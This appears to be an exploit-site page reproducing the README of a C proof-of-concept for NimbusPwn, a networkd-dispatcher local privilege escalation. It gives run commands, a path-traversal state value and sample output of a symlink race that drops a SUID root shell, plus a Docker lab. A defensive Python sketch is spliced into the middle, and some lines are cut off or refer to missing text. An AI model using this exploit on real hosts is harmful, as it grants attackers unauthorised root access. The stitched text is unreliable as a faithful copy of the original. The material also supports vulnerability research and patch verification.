## https://sploitus.com/exploit?id=7C677A10-9FA7-51FB-8E47-4CC7BE2CF1F8
NimbusPwn - networkd-dispatcher
## Description
A C PoC for NimbusPwn, a local privilege escalation in `networkd-dispatcher`. An unprivileged user claims the `org.freedesktop.network1` D-Bus name and sends a crafted `OperationalState`. The root daemon does not sanitize it (CVE-2022-29799, path traversal), and a symlink race on the script directory (CVE-2022-29800, TOCTOU) makes it run an attacker-planted script as root, dropping a SUID root shell.
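
Seen from the daemon's side, the two flaws above correspond to two checks made before anything is executed: accept only known state names, and pin the script directory through a file descriptor so a later symlink swap cannot redirect it. The Python sketch below is an added example, not the project's patch and not code from this PoC; `list_scripts`, its parameters and the state-name list are assumptions for illustration.

```python
import os
import stat

# Assumed for illustration: the state names whose <state>.d directories
# a dispatcher would serve. Anything else is rejected outright.
KNOWN_STATES = frozenset({
    "off", "no-carrier", "dormant", "carrier",
    "degraded", "routable", "configuring", "configured",
})


def _trusted(st, uid):
    """Owned by the trusted uid and not writable by group or others."""
    return st.st_uid == uid and not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)


def list_scripts(base, state, trusted_uid=0):
    """Return script names in <base>/<state>.d that pass every check, else []."""
    # Path traversal (CVE-2022-29799 class): an allowlist keeps "../" out of the path.
    if state not in KNOWN_STATES:
        return []
    flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
    try:
        # O_NOFOLLOW refuses a <state>.d that is itself a symlink.
        fd = os.open(os.path.join(base, state + ".d"), flags)
    except OSError:
        return []
    try:
        # TOCTOU (CVE-2022-29800 class): all checks go through the pinned fd,
        # so replacing the path afterwards does not change what is inspected.
        if not _trusted(os.fstat(fd), trusted_uid):
            return []
        found = []
        for name in sorted(os.listdir(fd)):
            st = os.stat(name, dir_fd=fd, follow_symlinks=False)
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IXUSR
                    and _trusted(st, trusted_uid)):
                found.append(name)
        return found
    finally:
        os.close(fd)
```

A daemon applying this would keep the descriptor open and open each script relative to it (`dir_fd`) when executing, rather than going back to the path.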
**Affected:** `networkd-dispatcher

> [!NOTE]
> Other distros: `dnf install gcc dbus-devel pkgconf` (Fedora/RHEL) or `pacman -S gcc dbus pkgconf` (Arch). The compile line is the same.
## Usage
Run as an unprivileged user on a vulnerable host.
```bash
./nimbuspwn [-c] [-s SHELL]
-c, --check non-breaking vuln check, no exploitation
-s, --shell SHELL shell to SUID-copy and spawn as root (default /bin/sh)
-h, --help show help
```
Check first (safe, plants nothing, never races):
```bash
$ ./nimbuspwn --check
[+] owned org.freedesktop.network1
[+] verdict: likely vulnerable (org.freedesktop.network1 is claimable, no privesc tried)
```
Then exploit:
```bash
$ ./nimbuspwn
[*] shell=/bin/sh drop=/tmp/sh attempts=10
[+] owned org.freedesktop.network1
[@] attempt 1 (/tmp/nimbuspwn_93732)
[+] planted 126 payloads (root-owned /sbin execs) in /tmp/nimbuspwn_93732
[*] OperationalState: ../../../tmp/nimbuspwn_93732/poc
[*] signal sent (serial 3)
[@] symlink swapped, waiting for root exec
[+] root backdoor at /tmp/sh, spawning shell
# id
uid=1000(pwn) gid=1000(pwn) euid=0(root) groups=1000(pwn)
```
The race is non-deterministic, so it retries (default 10×). Use `-s /bin/bash` on hosts without `/bin/sh`.
## Docker PoC
A self-contained vulnerable lab (Ubuntu 20.04 + vulnerable networkd-dispatcher 2.0). No `--privileged` or host networking.
```bash
docker compose build
docker compose run --rm nimbuspwn-lab
# inside, as user 'pwn':
./nimbuspwn
```
The 2.0 dispatcher is vendored in `docker/` so the build does not depend on any external download. Dispatcher log: `/var/log/dispatcher.log`.
## References
- Microsoft: https://www.microsoft.com/en-us/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/
- Upstream: https://gitlab.com/craftyguy/networkd-dispatcher
## Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.